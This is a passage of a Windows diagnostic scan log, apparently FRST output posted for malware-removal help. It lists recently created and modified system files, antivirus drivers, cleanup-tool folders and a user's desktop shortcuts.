2017-04-12 14:42 - 2017-03-08 00:21 - 00644096 _____ (Microsoft Corporation) C:\Windows\system32\advapi32.dll
2017-04-12 14:42 - 2017-03-08 00:21 - 00082432 _____ (Microsoft Corporation) C:\Windows\system32\bcrypt.dll
2017-04-12 14:42 - 2017-03-08 00:21 - 00050688 _____ (Microsoft Corporation) C:\Windows\system32\appidapi.dll
2017-04-12 14:42 - 2017-03-08 00:21 - 00006656 _____ (Microsoft Corporation) C:\Windows\system32\apisetschema.dll
2017-04-12 14:42 - 2017-03-08 00:21 - 00005120 ____H (Microsoft Corporation) C:\Windows\system32\api-ms-win-core-file-l1-1-0.dll
2017-04-12 14:42 - 2017-03-08 00:21 - 00004608 ____H (Microsoft Corporation) C:\Windows\system32\api-ms-win-core-processthreads-l1-1-0.dll
2017-04-12 14:42 - 2017-03-08 00:21 - 00004096 ____H (Microsoft Corporation) C:\Windows\system32\api-ms-win-core-sysinfo-l1-1-0.dll
2017-04-12 14:42 - 2017-03-08 00:21 - 00004096 ____H (Microsoft Corporation) C:\Windows\system32\api-ms-win-core-synch-l1-1-0.dll
2017-04-12 14:42 - 2017-03-08 00:21 - 00004096 ____H (Microsoft Corporation) C:\Windows\system32\api-ms-win-core-misc-l1-1-0.dll
2017-04-12 14:42 - 2017-03-08 00:21 - 00004096 ____H (Microsoft Corporation) C:\Windows\system32\api-ms-win-core-localregistry-l1-1-0.dll
2017-04-12 14:42 - 2017-03-08 00:21 - 00004096 ____H (Microsoft Corporation) C:\Windows\system32\api-ms-win-core-localization-l1-1-0.dll
2017-04-12 14:42 - 2017-03-08 00:21 - 00003584 ____H (Microsoft Corporation) C:\Windows\system32\api-ms-win-core-processenvironment-l1-1-0.dll
2017-04-12 14:42 - 2017-03-08 00:21 - 00003584 ____H (Microsoft Corporation) C:\Windows\system32\api-ms-win-core-namedpipe-l1-1-0.dll
2017-04-12 14:42 - 2017-03-08 00:21 - 00003584 ____H (Microsoft Corporation) C:\Windows\system32\api-ms-win-core-memory-l1-1-0.dll
2017-04-12 14:42 - 2017-03-08 00:21 - 00003584 ____H (Microsoft Corporation) C:\Windows\system32\api-ms-win-core-libraryloader-l1-1-0.dll
2017-04-12 14:42 - 2017-03-08 00:21 - 00003584 ____H (Microsoft Corporation) C:\Windows\system32\api-ms-win-core-interlocked-l1-1-0.dll
2017-04-12 14:42 - 2017-03-08 00:21 - 00003584 ____H (Microsoft Corporation) C:\Windows\system32\api-ms-win-core-heap-l1-1-0.dll
2017-04-12 14:42 - 2017-03-08 00:21 - 00003072 ____H (Microsoft Corporation) C:\Windows\system32\api-ms-win-core-string-l1-1-0.dll
2017-04-12 14:42 - 2017-03-08 00:21 - 00003072 ____H (Microsoft Corporation) C:\Windows\system32\api-ms-win-core-rtlsupport-l1-1-0.dll
2017-04-12 14:42 - 2017-03-08 00:21 - 00003072 ____H (Microsoft Corporation) C:\Windows\system32\api-ms-win-core-profile-l1-1-0.dll
2017-04-12 14:42 - 2017-03-08 00:21 - 00003072 ____H (Microsoft Corporation) C:\Windows\system32\api-ms-win-core-io-l1-1-0.dll
2017-04-12 14:42 - 2017-03-08 00:21 - 00003072 ____H (Microsoft Corporation) C:\Windows\system32\api-ms-win-core-handle-l1-1-0.dll
2017-04-12 14:42 - 2017-03-08 00:21 - 00003072 ____H (Microsoft Corporation) C:\Windows\system32\api-ms-win-core-fibers-l1-1-0.dll
2017-04-12 14:42 - 2017-03-08 00:21 - 00003072 ____H (Microsoft Corporation) C:\Windows\system32\api-ms-win-core-errorhandling-l1-1-0.dll
2017-04-12 14:42 - 2017-03-08 00:21 - 00003072 ____H (Microsoft Corporation) C:\Windows\system32\api-ms-win-core-delayload-l1-1-0.dll
2017-04-12 14:42 - 2017-03-08 00:21 - 00003072 ____H (Microsoft Corporation) C:\Windows\system32\api-ms-win-core-debug-l1-1-0.dll
2017-04-12 14:42 - 2017-03-08 00:21 - 00003072 ____H (Microsoft Corporation) C:\Windows\system32\api-ms-win-core-datetime-l1-1-0.dll
2017-04-12 14:42 - 2017-03-08 00:21 - 00003072 ____H (Microsoft Corporation) C:\Windows\system32\api-ms-win-core-console-l1-1-0.dll
2017-04-12 14:42 - 2017-03-07 23:58 - 00097792 _____ (Microsoft Corporation) C:\Windows\system32\appidpolicyconverter.exe
2017-04-12 14:42 - 2017-03-07 23:58 - 00050688 _____ (Microsoft Corporation) C:\Windows\system32\Drivers\appid.sys
2017-04-12 14:42 - 2017-03-07 23:58 - 00029696 _____ (Microsoft Corporation) C:\Windows\system32\appidsvc.dll
2017-04-12 14:42 - 2017-03-07 23:58 - 00016896 _____ (Microsoft Corporation) C:\Windows\system32\appidcertstorecheck.exe
2017-04-12 14:42 - 2017-03-07 23:57 - 00050176 _____ (Microsoft Corporation) C:\Windows\system32\auditpol.exe
2017-04-12 14:42 - 2017-03-07 23:56 - 00271360 _____ (Microsoft Corporation) C:\Windows\system32\conhost.exe
2017-04-12 14:42 - 2017-03-07 23:55 - 00262656 _____ (Microsoft Corporation) C:\Windows\system32\rstrui.exe
2017-04-12 14:42 - 2017-03-07 23:54 - 00226304 _____ (Microsoft Corporation) C:\Windows\system32\Drivers\mrxsmb10.sys
2017-04-12 14:42 - 2017-03-07 23:54 - 00124416 _____ (Microsoft Corporation) C:\Windows\system32\Drivers\mrxsmb.sys
2017-04-12 14:42 - 2017-03-07 23:54 - 00098304 _____ (Microsoft Corporation) C:\Windows\system32\Drivers\mrxsmb20.sys
2017-04-12 14:42 - 2017-03-07 23:53 - 00069632 _____ (Microsoft Corporation) C:\Windows\system32\smss.exe
2017-04-12 14:42 - 2017-03-07 23:53 - 00036352 _____ (Microsoft Corporation) C:\Windows\system32\cryptbase.dll
2017-04-12 14:42 - 2017-03-07 23:53 - 00022016 _____ (Microsoft Corporation) C:\Windows\system32\lsass.exe
2017-04-12 14:42 - 2017-03-07 23:53 - 00015872 _____ (Microsoft Corporation) C:\Windows\system32\sspisrv.dll
2017-04-12 14:42 - 2017-03-07 23:53 - 00006144 ____H (Microsoft Corporation) C:\Windows\system32\api-ms-win-security-base-l1-1-0.dll
2017-04-12 14:42 - 2017-03-07 23:53 - 00004608 ____H (Microsoft Corporation) C:\Windows\system32\api-ms-win-core-threadpool-l1-1-0.dll
2017-04-12 14:42 - 2017-03-07 23:53 - 00003584 ____H (Microsoft Corporation) C:\Windows\system32\api-ms-win-core-xstate-l1-1-0.dll
2017-04-12 14:42 - 2017-03-07 23:53 - 00003072 ____H (Microsoft Corporation) C:\Windows\system32\api-ms-win-core-util-l1-1-0.dll
2017-04-12 14:42 - 2017-03-07 12:17 - 00067584 _____ (Microsoft Corporation) C:\Windows\system32\asycfilt.dll
2017-04-12 14:42 - 2017-03-03 21:14 - 01329664 _____ (Microsoft Corporation) C:\Windows\system32\quartz.dll
2017-04-12 14:42 - 2017-03-03 21:14 - 00077312 _____ (Microsoft Corporation) C:\Windows\system32\mfmjpegdec.dll
2017-04-12 14:42 - 2017-02-14 12:19 - 00497664 _____ (Microsoft Corporation) C:\Windows\system32\win32spl.dll
2017-04-12 14:42 - 2017-02-11 12:16 - 00002048 _____ (Microsoft Corporation) C:\Windows\system32\tzres.dll
2017-04-12 14:42 - 2017-02-09 12:14 - 00575488 _____ (Microsoft Corporation) C:\Windows\system32\samsrv.dll
2017-04-12 14:42 - 2017-02-09 12:14 - 00060416 _____ (Microsoft Corporation) C:\Windows\system32\samlib.dll
2017-04-12 14:42 - 2017-01-18 11:35 - 00922432 _____ (Microsoft Corporation) C:\Windows\system32\ucrtbase.dll
2017-04-12 14:42 - 2017-01-18 11:35 - 00066400 _____ (Microsoft Corporation) C:\Windows\system32\api-ms-win-crt-private-l1-1-0.dll
2017-04-12 14:42 - 2017-01-18 11:35 - 00022368 _____ (Microsoft Corporation) C:\Windows\system32\api-ms-win-crt-math-l1-1-0.dll
2017-04-12 14:42 - 2017-01-18 11:35 - 00019808 _____ (Microsoft Corporation) C:\Windows\system32\api-ms-win-crt-multibyte-l1-1-0.dll
2017-04-12 14:42 - 2017-01-18 11:35 - 00017760 _____ (Microsoft Corporation) C:\Windows\system32\api-ms-win-crt-string-l1-1-0.dll
2017-04-12 14:42 - 2017-01-18 11:35 - 00017760 _____ (Microsoft Corporation) C:\Windows\system32\api-ms-win-crt-stdio-l1-1-0.dll
2017-04-12 14:42 - 2017-01-18 11:35 - 00016224 _____ (Microsoft Corporation) C:\Windows\system32\api-ms-win-crt-runtime-l1-1-0.dll
2017-04-12 14:42 - 2017-01-18 11:35 - 00015712 _____ (Microsoft Corporation) C:\Windows\system32\api-ms-win-crt-convert-l1-1-0.dll
2017-04-12 14:42 - 2017-01-18 11:35 - 00014176 _____ (Microsoft Corporation) C:\Windows\system32\api-ms-win-crt-time-l1-1-0.dll
2017-04-12 14:42 - 2017-01-18 11:35 - 00014176 _____ (Microsoft Corporation) C:\Windows\system32\api-ms-win-core-localization-l1-2-0.dll
2017-04-12 14:42 - 2017-01-18 11:35 - 00013664 _____ (Microsoft Corporation) C:\Windows\system32\api-ms-win-crt-filesystem-l1-1-0.dll
2017-04-12 14:42 - 2017-01-18 11:35 - 00012640 _____ (Microsoft Corporation) C:\Windows\system32\api-ms-win-crt-process-l1-1-0.dll
2017-04-12 14:42 - 2017-01-18 11:35 - 00012640 _____ (Microsoft Corporation) C:\Windows\system32\api-ms-win-crt-heap-l1-1-0.dll
2017-04-12 14:42 - 2017-01-18 11:35 - 00012640 _____ (Microsoft Corporation) C:\Windows\system32\api-ms-win-crt-conio-l1-1-0.dll
2017-04-12 14:42 - 2017-01-18 11:35 - 00012128 _____ (Microsoft Corporation) C:\Windows\system32\api-ms-win-crt-utility-l1-1-0.dll
2017-04-12 14:42 - 2017-01-18 11:35 - 00012128 _____ (Microsoft Corporation) C:\Windows\system32\api-ms-win-crt-locale-l1-1-0.dll
2017-04-12 14:42 - 2017-01-18 11:35 - 00012128 _____ (Microsoft Corporation) C:\Windows\system32\api-ms-win-crt-environment-l1-1-0.dll
2017-04-12 14:42 - 2017-01-18 11:35 - 00012128 _____ (Microsoft Corporation) C:\Windows\system32\api-ms-win-core-synch-l1-2-0.dll
2017-04-12 14:42 - 2017-01-18 11:35 - 00012128 _____ (Microsoft Corporation) C:\Windows\system32\api-ms-win-core-processthreads-l1-1-1.dll
2017-04-12 14:42 - 2017-01-18 11:35 - 00011616 _____ (Microsoft Corporation) C:\Windows\system32\api-ms-win-core-xstate-l2-1-0.dll
2017-04-12 14:42 - 2017-01-18 11:35 - 00011616 _____ (Microsoft Corporation) C:\Windows\system32\api-ms-win-core-timezone-l1-1-0.dll
2017-04-12 14:42 - 2017-01-18 11:35 - 00011616 _____ (Microsoft Corporation) C:\Windows\system32\api-ms-win-core-file-l2-1-0.dll
2017-04-12 14:42 - 2017-01-18 11:35 - 00011616 _____ (Microsoft Corporation) C:\Windows\system32\api-ms-win-core-file-l1-2-0.dll
2017-04-12 14:40 - 2017-04-12 14:40 - 00330256 _____ (AVAST Software) C:\Windows\system32\aswBoot.exe
2017-04-12 10:14 - 2017-04-12 13:57 - 00000000 ____D C:\Users\hilton75
2017-04-11 16:03 - 2017-04-13 12:34 - 00000000 ____D C:\FRST
2017-04-10 14:33 - 2017-04-12 16:22 - 00000594 _____ C:\Users\hilton\Desktop\SFC -SCANNOW s.website
2017-04-10 14:22 - 2017-04-10 14:22 - 00000000 ____D C:\Users\hilton\AppData\Roaming\Remo
2017-04-10 14:21 - 2017-04-10 16:17 - 00000000 ____D C:\Users\hilton\AppData\Roaming\Remo Speed Optimizer2.0
2017-04-10 14:21 - 2009-02-12 15:11 - 00022312 _____ (EldoS Corporation) C:\Windows\system32\Drivers\rsdrv.sys
2017-04-07 15:30 - 2017-04-12 13:52 - 00000608 _____ C:\Users\hilton\Desktop\Snopes. (1).website
2017-04-06 12:01 - 2017-04-12 14:25 - 00000000 ____D C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Malwarebytes
2017-04-06 12:01 - 2017-04-06 12:01 - 00000000 ____D C:\ProgramData\Malwarebytes
2017-04-06 12:01 - 2017-04-06 12:01 - 00000000 ____D C:\Program Files\Malwarebytes
2017-04-02 12:24 - 2017-04-02 16:17 - 00025188 _____ C:\AdsFix_02_04_2017_16_17_19.txt
2017-04-02 12:17 - 2017-04-12 14:26 - 00000000 ____D C:\AdsFix
2017-04-01 15:23 - 2017-04-01 15:23 - 00000227 _____ C:\Users\hilton\Desktop\The ASA Monitor - Home Page.URL
2017-03-30 12:37 - 2017-03-30 12:37 - 00519075 _____ C:\Users\hilton\Documents\NorthCarolina2014.pdf
2017-03-30 12:29 - 2017-03-30 12:29 - 00230674 ____R C:\QuickDiag_30_03_2017_12_29_51.txt
2017-03-30 12:06 - 2017-04-12 14:25 - 00000000 ____D C:\QuickDiag
2017-03-20 00:48 - 2017-03-20 00:48 - 00028352 _____ (Microsoft Corporation) C:\Windows\system32\aspnet_counters.dll
2017-03-20 00:48 - 2017-03-20 00:48 - 00019112 _____ (Microsoft Corporation) C:\Windows\system32\msvcr110_clr0400.dll
2017-03-20 00:48 - 2017-03-20 00:48 - 00019112 _____ (Microsoft Corporation) C:\Windows\system32\msvcr100_clr0400.dll
2017-03-20 00:48 - 2017-03-20 00:48 - 00019112 _____ (Microsoft Corporation) C:\Windows\system32\msvcp110_clr0400.dll
2017-03-19 13:44 - 2017-03-19 13:44 - 00832275 _____ C:\Users\hilton\Downloads\HealthSummary20170319.zi p
2017-03-19 10:48 - 2017-03-19 10:48 - 09274608 _____ (Piriform Ltd) C:\Users\hilton\Downloads\ccsetup528(1).exe
2017-03-14 15:23 - 2017-02-11 11:50 - 00313856 _____ (Microsoft Corporation) C:\Windows\system32\Drivers\srv2.sys
2017-03-14 15:23 - 2017-02-11 11:50 - 00311808 _____ (Microsoft Corporation) C:\Windows\system32\Drivers\srv.sys
2017-03-14 15:23 - 2017-02-11 11:50 - 00116224 _____ (Microsoft Corporation) C:\Windows\system32\Drivers\srvnet.sys
2017-03-14 15:23 - 2017-02-10 12:17 - 00628736 _____ (Microsoft Corporation) C:\Windows\system32\usp10.dll
2017-03-14 15:23 - 2017-02-10 10:33 - 01251328 _____ (Microsoft Corporation) C:\Windows\system32\DWrite.dll
2017-03-14 15:23 - 2017-02-10 10:33 - 00909824 _____ (Microsoft Corporation) C:\Windows\system32\FntCache.dll
2017-03-14 15:23 - 2017-02-09 12:14 - 00481792 _____ (Microsoft Corporation) C:\Windows\system32\mscms.dll
2017-03-14 15:23 - 2017-02-09 12:14 - 00215040 _____ (Microsoft Corporation) C:\Windows\system32\icm32.dll
2017-03-14 15:23 - 2017-02-09 11:51 - 00032768 _____ (Microsoft Corporation) C:\Windows\system32\WcsPlugInService.dll
2017-03-14 15:23 - 2017-02-06 12:03 - 00497152 _____ (Microsoft Corporation) C:\Windows\HelpPane.exe
2017-03-14 15:23 - 2017-01-13 13:45 - 00741888 _____ (Microsoft Corporation) C:\Windows\system32\inetcomm.dll
2017-03-14 15:23 - 2017-01-13 13:45 - 00084480 _____ (Microsoft Corporation) C:\Windows\system32\INETRES.dll
2017-03-14 15:23 - 2017-01-11 13:43 - 01241088 _____ (Microsoft Corporation) C:\Windows\system32\msxml3.dll
2017-03-14 15:23 - 2017-01-11 13:43 - 00002048 _____ (Microsoft Corporation) C:\Windows\system32\msxml3r.dll
2017-03-14 13:11 - 2017-03-14 13:11 - 09274608 _____ (Piriform Ltd) C:\Users\hilton\Downloads\ccsetup528.exe

==================== One Month Modified files and folders ========

(If an entry is included in the fixlist, the file/folder will be moved.)

2017-04-13 12:34 - 2016-07-27 13:35 - 00000525 _____ C:\Users\hilton\Desktop\Yahoo Mail.website
2017-04-13 12:27 - 2017-02-25 15:57 - 00000608 _____ C:\Users\hilton\Desktop\ Microsoft Community (1).website
2017-04-13 11:36 - 2016-12-30 13:38 - 00000000 ____D C:\Program Files\Mozilla Firefox
2017-04-13 11:12 - 2016-11-21 15:06 - 00000503 _____ C:\Users\hilton\Desktop\Hefs71’s Food Diary.website
2017-04-13 11:00 - 2016-09-14 12:55 - 00000487 _____ C:\Users\hilton\Desktop\GMAIL.website
2017-04-13 10:59 - 2016-06-29 19:08 - 00000617 _____ C:\Users\hilton\Desktop\outlook.website
2017-04-13 10:49 - 2016-12-30 13:39 - 00000000 ____D C:\Users\hilton\AppData\LocalLow\Mozilla
2017-04-13 10:49 - 2016-06-29 19:01 - 00000470 _____ C:\Users\hilton\Desktop\WELLS FARGO.website
2017-04-13 10:46 - 2016-06-30 15:18 - 00000544 _____ C:\Users\hilton\Desktop\Fredericksbur.website
2017-04-13 10:43 - 2016-06-30 15:19 - 00000565 _____ C:\Users\hilton\Desktop\N&O.website
2017-04-13 10:31 - 2016-06-30 15:17 - 00000629 _____ C:\Users\hilton\Desktop\DRUDGE REPORT 2016®.website
2017-04-13 04:19 - 2009-07-14 00:34 - 00021696 ____H C:\Windows\system32\7B296FB0-376B-497e-B012-9C450E1B7327-5P-1.C7483456-A289-439d-8115-601632D005A0
2017-04-13 04:19 - 2009-07-14 00:34 - 00021696 ____H C:\Windows\system32\7B296FB0-376B-497e-B012-9C450E1B7327-5P-0.C7483456-A289-439d-8115-601632D005A0
2017-04-12 19:43 - 2016-12-25 17:07 - 00002148 _____ C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Google Chrome.lnk
2017-04-12 19:43 - 2016-12-25 17:07 - 00002136 _____ C:\Users\Public\Desktop\Google Chrome.lnk
2017-04-12 19:43 - 2016-12-25 17:07 - 00002136 _____ C:\ProgramData\Desktop\Google Chrome.lnk
2017-04-12 18:39 - 2009-07-13 22:37 - 00000000 ____D C:\Windows\rescache
2017-04-12 16:26 - 2016-07-05 15:22 - 00000494 _____ C:\Users\hilton\Desktop\Netflix.website
2017-04-12 16:26 - 2016-07-02 14:57 - 00001224 _____ C:\Users\hilton\Desktop\sprint.website
2017-04-12 16:25 - 2016-08-26 14:33 - 00000468 _____ C:\Users\hilton\Desktop\PC Help Forum.website
2017-04-12 16:19 - 2016-07-13 12:29 - 00002441 _____ C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Acrobat Reader DC.lnk
2017-04-12 16:11 - 2016-08-12 15:03 - 00000000 ____D C:\ProgramData\Microsoft\Windows\Start Menu\Programs\RoboForm
2017-04-12 16:09 - 2017-02-03 13:54 - 00000000 ____D C:\Users\hilton\AppData\Roaming\eM Client
2017-04-12 16:08 - 2010-11-20 17:01 - 00781298 _____ C:\Windows\system32\PerfStringBackup.INI
2017-04-12 16:08 - 2009-07-13 22:37 - 00000000 ____D C:\Windows\inf
2017-04-12 16:06 - 2016-11-06 15:03 - 00000450 _____ C:\Windows\Tasks\DriverUpdate Scan.job
2017-04-12 16:03 - 2009-07-14 00:53 - 00000006 ____H C:\Windows\Tasks\SA.DAT
2017-04-12 16:03 - 2009-07-14 00:33 - 00290256 _____ C:\Windows\system32\FNTCACHE.DAT
2017-04-12 15:29 - 2016-07-03 03:09 - 00000000 ____D C:\Windows\system32\MRT
2017-04-12 15:25 - 2016-07-09 17:12 - 00000000 ____D C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Microsoft Silverlight
2017-04-12 15:25 - 2016-07-03 03:09 - 145733648 ____C (Microsoft Corporation) C:\Windows\system32\MRT.exe
2017-04-12 15:24 - 2016-07-09 17:12 - 00000000 ____D C:\Program Files\Microsoft Silverlight
2017-04-12 15:18 - 2016-07-03 12:22 - 00065776 _____ C:\Windows\system32\GDIPFONTCACHEV1.DAT
2017-04-12 14:42 - 2016-07-04 15:23 - 00802904 _____ (Adobe Systems Incorporated) C:\Windows\system32\FlashPlayerApp.exe
2017-04-12 14:42 - 2016-07-04 15:23 - 00144472 _____ (Adobe Systems Incorporated) C:\Windows\system32\FlashPlayerCPLApp.cpl
2017-04-12 14:42 - 2016-07-04 15:23 - 00000000 ____D C:\Windows\system32\Macromed
2017-04-12 14:40 - 2016-12-18 22:20 - 00472760 _____ (AVAST Software) C:\Windows\system32\Drivers\aswSP.sys
2017-04-12 14:40 - 2016-12-18 22:20 - 00279800 _____ (AVAST Software) C:\Windows\system32\Drivers\aswVmm.sys
2017-04-12 14:40 - 2016-12-18 22:20 - 00118800 _____ (AVAST Software) C:\Windows\system32\Drivers\aswStm.sys
2017-04-12 14:40 - 2016-12-18 22:20 - 00106904 _____ (AVAST Software) C:\Windows\system32\Drivers\aswMonFlt.sys
2017-04-12 14:40 - 2016-12-18 22:20 - 00090336 _____ (AVAST Software) C:\Windows\system32\Drivers\aswRdr2.sys
2017-04-12 14:40 - 2016-12-18 22:20 - 00062152 _____ (AVAST Software) C:\Windows\system32\Drivers\aswRvrt.sys
2017-04-12 14:40 - 2016-12-18 22:20 - 00034136 _____ (AVAST Software) C:\Windows\system32\Drivers\aswHwid.sys
2017-04-12 14:40 - 2016-06-29 16:30 - 00000000 ____D C:\Users\hilton
2017-04-12 14:39 - 2016-12-18 22:38 - 00388488 _____ (AVAST Software) C:\Windows\system32\Drivers\aswNetSec.sys
2017-04-12 14:39 - 2016-12-18 22:22 - 00031064 _____ (AVAST Software) C:\Windows\system32\Drivers\aswKbd.sys
2017-04-12 14:39 - 2016-12-18 22:20 - 00764064 _____ (AVAST Software) C:\Windows\system32\Drivers\aswSnx.sys
2017-04-12 14:38 - 2017-03-12 08:27 - 00267528 _____ (AVAST Software s.r.o.) C:\Windows\system32\Drivers\aswblogx.sys
2017-04-12 14:38 - 2017-03-12 08:27 - 00255184 _____ (AVAST Software s.r.o.) C:\Windows\system32\Drivers\aswbidsdriverx.sys
2017-04-12 14:38 - 2017-03-12 08:27 - 00148208 _____ (AVAST Software s.r.o.) C:\Windows\system32\Drivers\aswbidshx.sys
2017-04-12 14:38 - 2017-03-12 08:27 - 00041176 _____ (AVAST Software s.r.o.) C:\Windows\system32\Drivers\aswbunivx.sys
2017-04-12 14:34 - 2017-01-03 12:16 - 00000000 _____ C:\Windows\system32\last.dump
2017-04-12 14:30 - 2017-01-20 14:40 - 00000000 ___SD C:\ProgramData\Microsoft\Windows\Start Menu\Programs\OpenOffice 4.1.3
2017-04-12 14:28 - 2017-03-13 15:54 - 00000000 ____D C:\Users\hilton\AppData\Roaming\Microsoft\Windows\ Start Menu\Programs\Kodi
2017-04-12 14:28 - 2017-02-12 15:08 - 00000000 ____D C:\Windows\WindowsMobile
2017-04-12 14:28 - 2017-02-07 16:45 - 00000000 ____D C:\Users\hilton\Downloads\x64
2017-04-12 14:28 - 2017-02-07 16:45 - 00000000 ____D C:\Users\hilton\Downloads\HECI
2017-04-12 14:28 - 2017-02-07 16:29 - 00000000 ____D C:\Users\hilton\AppData\Roaming\Microsoft\Windows\ Start Menu\Programs\Dell
2017-04-12 14:28 - 2017-01-28 15:13 - 00000000 ___HD C:\Windows\system32\CanonIJ Uninstaller Information
2017-04-12 14:28 - 2017-01-20 14:48 - 00000000 ____D C:\Users\hilton\Documents\OpenOffice 4.1.3 (en-US) Installation Files
2017-04-12 14:28 - 2016-09-05 14:21 - 00000000 __RSD C:\Users\hilton\Documents\McAfee Vaults
2017-04-12 14:28 - 2016-09-05 14:04 - 00000000 ____D C:\Users\hilton\AppData\Roaming\McAfee
2017-04-12 14:28 - 2016-08-01 13:59 - 00000000 ____D C:\Users\Public\Documents\Downloaded Installers
2017-04-12 14:28 - 2016-08-01 13:59 - 00000000 ____D C:\ProgramData\Documents\Downloaded Installers
2017-04-12 14:28 - 2016-07-15 13:40 - 00000000 ____D C:\Users\hilton\AppData\Roaming\InstantSupport
2017-04-12 14:28 - 2016-07-06 16:40 - 00000000 ____D C:\Users\hilton\Documents\OpenOffice 4.1.2 (en-US) Installation Files
2017-04-12 14:28 - 2016-07-05 14:37 - 00000000 ____D C:\Users\hilton\AppData\Roaming\Microsoft\Windows\ Start Menu\Programs\Amazon Music
2017-04-12 14:28 - 2016-07-02 15:44 - 00000000 ____D C:\Users\PCPitstopSVC
2017-04-12 14:28 - 2016-07-02 15:23 - 00000000 ____D C:\Users\hilton\AppData\LocalLow\Adblock Plus for IE
2017-04-12 14:28 - 2016-07-02 13:55 - 00000000 ____D C:\Windows\Minidump
2017-04-12 14:28 - 2016-07-01 13:11 - 00000000 ____D C:\Users\hilton\AppData\Roaming\RoboForm
2017-04-12 14:28 - 2016-06-30 18:39 - 00000000 ____D C:\Users\hilton\AppData\Local\Stardock
2017-04-12 14:28 - 2016-06-30 18:38 - 00000000 ____D C:\Users\hilton\Downloads\Stardock
2017-04-12 14:28 - 2012-07-23 20:44 - 00000000 ____D C:\Windows\OEM
2017-04-12 14:28 - 2012-07-23 20:44 - 00000000 ____D C:\Windows\ConfigSetRoot
2017-04-12 14:28 - 2012-07-23 19:52 - 00000000 ____D C:\Windows\system32\Lang
2017-04-12 14:28 - 2009-07-14 00:52 - 00000000 ___RD C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Games
2017-04-12 14:28 - 2009-07-14 00:52 - 00000000 ____D C:\Program Files\Windows Sidebar
2017-04-12 14:28 - 2009-07-14 00:34 - 00000000 ____D C:\Windows\Setup
2017-04-12 14:28 - 2009-07-13 22:37 - 00000000 __RHD C:\Users\Public\Libraries
2017-04-12 14:28 - 2009-07-13 22:37 - 00000000 ____D C:\Windows\system32\NDF
2017-04-12 14:28 - 2009-07-13 22:37 - 00000000 ____D C:\Windows\servicing
2017-04-12 14:28 - 2009-07-13 22:37 - 00000000 ____D C:\Windows\PolicyDefinitions
2017-04-12 14:28 - 2009-07-13 22:37 - 00000000 ____D C:\Windows\AppCompat
2017-04-12 14:28 - 2009-07-13 22:37 - 00000000 ____D C:\Program Files\Common Files\System
2017-04-12 14:27 - 2017-03-13 15:53 - 00000000 ____D C:\Program Files\Kodi
2017-04-12 14:27 - 2017-03-13 15:39 - 00000000 ____D C:\Users\hilton\AppData\Local\FromDocToPDFTooltab
2017-04-12 14:27 - 2017-02-03 13:52 - 00000000 ____D C:\Program Files\eM Client
2017-04-12 14:27 - 2017-01-28 15:19 - 00000000 ____D C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Canon Utilities
2017-04-12 14:27 - 2017-01-28 15:13 - 00000000 ____D C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Canon MG3200 series
2017-04-12 14:27 - 2016-12-30 13:38 - 00000000 ____D C:\Program Files\Mozilla Maintenance Service
2017-04-12 14:27 - 2016-12-25 13:38 - 00000000 ____D C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Stardock
2017-04-12 14:27 - 2016-12-18 22:41 - 00000000 ____D C:\ProgramData\Microsoft\Windows\Start Menu\Programs\AVAST Software
2017-04-12 14:27 - 2016-12-06 18:45 - 00000000 ____D C:\Users\hilton\AppData\Local\76f7c66
2017-04-12 14:27 - 2016-09-26 12:01 - 00000000 ____D C:\Users\hilton\AppData\Local\CrashRpt
2017-04-12 14:27 - 2016-09-26 12:01 - 00000000 ____D C:\ProgramData\Microsoft\Windows\Start Menu\Programs\DriverUpdate
2017-04-12 14:27 - 2016-09-26 12:01 - 00000000 ____D C:\Program Files\SlimWare Utilities
2017-04-12 14:27 - 2016-09-26 12:01 - 00000000 ____D C:\Program Files\DriverUpdate
2017-04-12 14:27 - 2016-09-05 14:03 - 00000000 ____D C:\Program Files\McAfee
2017-04-12 14:27 - 2016-08-21 14:25 - 00000000 ____D C:\Program Files\Microsoft Games
2017-04-12 14:27 - 2016-08-01 14:09 - 00000000 ____D C:\ProgramData\SlimWare Utilities, Inc
2017-04-12 14:27 - 2016-08-01 13:59 - 00000000 ____D C:\Users\hilton\AppData\Local\SlimWare Utilities Inc
2017-04-12 14:27 - 2016-07-05 14:36 - 00000000 ____D C:\Users\hilton\AppData\Local\Amazon Music
2017-04-12 14:27 - 2016-07-02 15:54 - 00000000 ____D C:\Users\hilton\AppData\Local\PC_Drivers_Headquart ers
2017-04-12 14:27 - 2016-07-02 15:53 - 00000000 ____D C:\Program Files\Driver Support
2017-04-12 14:27 - 2016-07-02 15:47 - 00000000 ____D C:\ProgramData\Microsoft\Windows\Start Menu\Programs\CCleaner
2017-04-12 14:27 - 2016-07-02 15:47 - 00000000 ____D C:\Program Files\CCleaner
2017-04-12 14:27 - 2016-07-02 15:09 - 00000000 ____D C:\ProgramData\PCPitstop
2017-04-12 14:27 - 2012-07-23 19:53 - 00000000 ____D C:\Program Files\Common Files\postureAgent
2017-04-12 14:27 - 2012-07-23 19:52 - 00000000 ____D C:\Program Files\Intel
2017-04-12 14:27 - 2009-07-13 22:37 - 00000000 ____D C:\Program Files\Common Files\microsoft shared
2017-04-12 14:24 - 2009-07-13 22:37 - 00000000 ____D C:\Windows\registration
2017-04-12 14:23 - 2009-07-13 22:37 - 00000000 ____D C:\Windows\Vss
2017-04-12 14:23 - 2009-07-13 22:37 - 00000000 ____D C:\Windows\system32\spool
2017-04-12 14:22 - 2009-07-14 00:34 - 00000000 ____D C:\Windows\ServiceProfiles
2017-04-12 14:22 - 2009-07-13 22:37 - 00000000 ____D C:\Windows\PLA
2017-04-12 14:21 - 2009-07-13 22:37 - 00000000 ____D C:\Windows\Help
2017-04-12 14:19 - 2017-02-07 16:45 - 00000000 ____D C:\Users\hilton\Downloads\Lang
2017-04-12 14:19 - 2016-12-30 13:38 - 00000000 ____D C:\Users\hilton\AppData\Roaming\Mozilla
2017-04-12 14:19 - 2016-08-12 12:28 - 00000000 ____D C:\Users\hilton\AppData\Roaming\Dashlane
2017-04-12 14:19 - 2016-07-27 14:22 - 00000000 ____D C:\Users\hilton\Documents\Fax
2017-04-12 14:19 - 2016-07-04 15:13 - 00000000 ____D C:\Users\hilton\AppData\Roaming\OpenOffice
2017-04-12 14:19 - 2016-06-30 18:39 - 00000000 ____D C:\Users\hilton\Documents\Stardock
